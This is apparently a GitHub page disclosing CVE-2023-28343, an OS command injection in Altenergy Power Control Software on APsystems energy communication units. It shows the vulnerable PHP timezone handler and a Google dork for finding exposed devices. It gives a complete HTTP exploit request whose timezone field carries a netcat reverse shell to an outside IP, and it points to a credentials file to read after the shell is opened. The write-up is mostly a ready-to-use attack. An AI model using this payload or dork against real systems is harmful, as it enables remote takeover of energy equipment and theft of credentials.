Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

title : OS command injection affects "Altenergy Power Control Software"

SW ver: C1.2.5

Vendor: https://apsystems.com/

CVE: CVE-2023-28343

Google Dork: intitle:"Altenergy Power Control Software"

Affected device: ENERGY COMMUNICATION UNIT

Alt Text

POC Video :

Watch the video

vulnerable code :

"/home/local_web/pagesapplication/models/management_model.php"

   public function set_timezone()
    {
        $results = array();

        //获取页面选择的时区
        $timezone = $this->input->post('timezone');
        if(strlen($timezone) == 0)
                $timezone = "Asia/Taipei";

        //设置linux系统时区
        $cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
        system($cmd);

        //将时区保存到配置文件
        $fp = @fopen("/etc/yuneng/timezone.conf",'w');
        if($fp){
            fwrite($fp, $timezone);
            fclose($fp);
        }

Exploit :

HTTP request :

POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

timezone=`mknod /tmp/backpipe p ;/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`

POC :

Alt Text

** note **

  • please use the following command after getting shell to avoid distorying the WEBUI.
    "echo Asia/Taipei > /etc/yuneng/timezone.conf"

Important files to check :

  • /etc/yuneng/passwd.conf this file contains the credentials for the WebUI.

##References: